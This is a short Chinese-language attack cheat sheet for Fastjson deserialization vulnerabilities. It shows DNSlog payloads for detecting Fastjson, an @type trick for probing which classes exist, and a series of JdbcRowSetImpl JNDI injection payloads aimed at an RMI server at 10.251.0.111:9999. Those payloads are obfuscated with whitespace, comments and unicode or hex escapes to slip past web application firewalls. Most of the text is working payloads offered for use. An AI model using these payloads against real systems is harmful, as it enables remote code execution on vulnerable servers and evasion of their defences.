参考 https://github.com/Firebasky/fastjson
坑
fastjson版本低导致dnslog打不通.(反序列化也遇到了)
fastjson识别
在json中添加键值对,如果响应没有报错,则说明使用的可能是fastJSON,因为 jackson的键值对只能少不能多,如果多了,则多多少少会报错。
- 通过DNS回显的方式检测后端是否使用了fastjson.
- {{“@type”:”java.net.URL”,”val”:”http://dnslog"}:"x"}
- {“@type”:”java.net.InetAddress”,”val”:”dnslog”}
- {“a”:”x\u001a\u001a”}
利用时判断类是否存在
```json 通过@tpye去判断存在的类
{ “@type”:”java.lang.AutoCloseable”, “@type”:”xxx.xxx.xxx” } 如果报错就说明存在该类,反之
<a name="Hoq8v"></a>
### bypass waf
1. Fastjson默认会去除键、值外的空格、\b、\n、\r、\f等,同时还会自动将键与值进行unicode与十六进制解码。
```json
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{ "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{/*s6*/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{\n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"@type"\b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true} {"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
绕waf姿势汇总: https://www.sec-in.com/article/950